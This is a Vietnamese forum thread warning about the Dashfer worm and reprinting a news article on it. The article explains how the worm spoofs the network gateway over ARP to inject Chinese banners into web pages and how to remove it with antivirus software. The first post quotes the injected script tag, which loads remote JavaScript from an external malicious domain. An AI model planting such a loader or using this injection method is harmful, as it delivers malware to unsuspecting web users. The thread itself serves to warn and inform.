Kết quả 1 đến 3 của 3
  1. #1
    Vi phạm Nội Quy Administrator hrockvn's Avatar
    Ngày tham gia
    06 Jan 2006
    Đang ở
    Thanh Xuân vỉa hè quán
    Bài viết
    3,761
    Thanks
    13
    Thanked 20 Times in 14 Posts
    Rep Power
    30

    Mặc định Virus Dashfer đang bùng phát ở Việt Nam

    Đây có lẽ là vụ trả thù của hacker Trung Quốc. Chiều nay, các máy trong Cty tớ có hiện tượng truy cập các website thì bị chèn thêm cái banner của Trung Quốc.
    Đây là đoạn script đc thêm vào.
    Code:
    <script src=http://360.gcdws.com/1.js></script>
    Nó request đến:
    http://360.gcdws.com/html/dg1.html
    và 1 trang nữa.

    Cách tiêu diệt hông khó. Đơn giản nhất là sài BKAV. Bác Quảng đã phát hiện ra. Theo tớ biết thì Kaspersky chưa diệt đc.

    TTO - Sáng 27-12, Trung tâm an ninh mạng BKIS cảnh báo virus W32.Dashfer đang bùng phát tại VN và đã lây nhiễm vào gần 60.000 máy tính. Khi bị nhiễm loại sâu này, người dùng máy tính vào bất kỳ trang web nào đều thấy một banner chữ Trung Quốc hiện lên trên đầu site.
    Theo BKIS, virus giả mạo Gateway trên có xuất xứ từ Trung Quốc. Nó bắt đầu lây nhiễm mạnh từ ngày 14-12-2007, tới nay đã có tới 14 biến thể của Dashfer xuất hiện. Nguồn phát tán chủ yếu của virus này là qua các website chứa mã độc hại và qua đĩa USB.
    Tại các cơ quan có hệ thống mạng nội bộ, hiện tượng này xảy ra đồng loạt trên tất cả các máy tính trong mạng, khiến cho các quản trị mạng lúng túng, không có cách giải quyết.
    "Từ một máy tính nhiễm virus, Dashfer gửi gói tin theo giao thức ARP (giao thức phân giải địa chỉ) tới tất cả các máy tính khác trong cùng mạng để mạo danh là gateway của hệ thống. Các kết nối ra Internet của mọi PC trong mạng lúc này sẽ bị lừa đi qua gateway giả mạo trước rồi mới tới cổng mạng thật.
    Bằng cách này, Dashfer sẽ kiểm soát được toàn bộ quá trình trao đổi dữ liệu, chèn thêm banner, popup vào nội dung các trang web trước khi chúng được trả về cho máy tính của người sử dụng", ông Nguyễn Tử Quảng, Giám đốc BKIS, cho biết.
    Với phương thức như vậy, không phải máy tính nào xuất hiện banner cũng là bị dính virus vì trong mạng chỉ cần 1 máy nhiễm thì các máy khác vào mạng đều thấy bị chèn banner dù máy đó "sạch virus". Còn PC mà có virus chính là cổng mạng giả.

    Quá trình chèn banner, popup của virus Dashfer
    Ông Quảng khuyến cáo người dung hãy quét virus cho toàn bộ các máy tính trong cơ quan để giải quyết triệt để hiện tượng trên. Trong trường hợp không có điều kiện để quét virus cho tất cả các máy tính, có thể xác định máy tính đang bị nhiễm virus, sau đó diệt trên máy này.
    Hiện nay, BKIS đã cập nhật những mẫu virus này vào phiên bản Bkav mới nhất. Nếu gặp những hiện tượng như mô tả trên, bạn có thể tải về phần mềm diệt virus Bkav từ địa chỉ www.bkav.com.vn để xử lý.
    http://www.tuoitre.com.vn/Tianyon/In...4&ChannelID=16
    My blog
    My
    facebook
    My
    website
    D2T
    Fanpage

    "Lúc trước mình đẹp trai lắm, nhưng bây giờ đỡ nhiều rồi"

  2. #2
    Nhập môn đồ đệ ĐDT Member
    Ngày tham gia
    04 Jan 2008
    Tuổi
    25
    Bài viết
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Rep Power
    53

    Mặc định Re: Virus Dashfer đang bùng phát ở Việt Nam

    hay quá mình cũng bị dính cái này chưa biết làm sao , thanks trước nha

  3. #3
    Vi phạm Nội Quy Banned
    Ngày tham gia
    04 Feb 2006
    Đang ở
    Thanh hóa
    Bài viết
    49
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Rep Power
    0

    Mặc định Re: Virus Dashfer đang bùng phát ở Việt Nam

    bọn này láo nhờ, đù má nó chứ thảo nào mình thấy web lại có thêm banner của trung quốc, mà source chẳng thấy code đâu

Thông tin về chủ đề này

Users Browsing this Thread

Có 1 người đang xem chủ đề. (0 thành viên và 1 khách)

Các Chủ đề tương tự

  1. Trả lời: 5
    Bài viết cuối: 12-06-2007, 01:24 PM
  2. Tự bảo vệ trước đại dịch virus
    Bởi ngayxua trong diễn đàn Security
    Trả lời: 0
    Bài viết cuối: 22-01-2007, 02:12 PM
  3. hãy bảo vệ máy tính của bạn bơi virus
    Bởi 1stPrO trong diễn đàn Tin học
    Trả lời: 0
    Bài viết cuối: 04-01-2007, 07:10 PM
  4. Loại bỏ Virus YM như thế nào
    Bởi hrockvn trong diễn đàn Security
    Trả lời: 0
    Bài viết cuối: 29-10-2006, 03:25 PM
  5. Danh sách các link có virus hoặc nghi ngờ có virus
    Bởi hrockvn trong diễn đàn Security
    Trả lời: 4
    Bài viết cuối: 08-10-2006, 01:38 AM

Đánh dấu

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •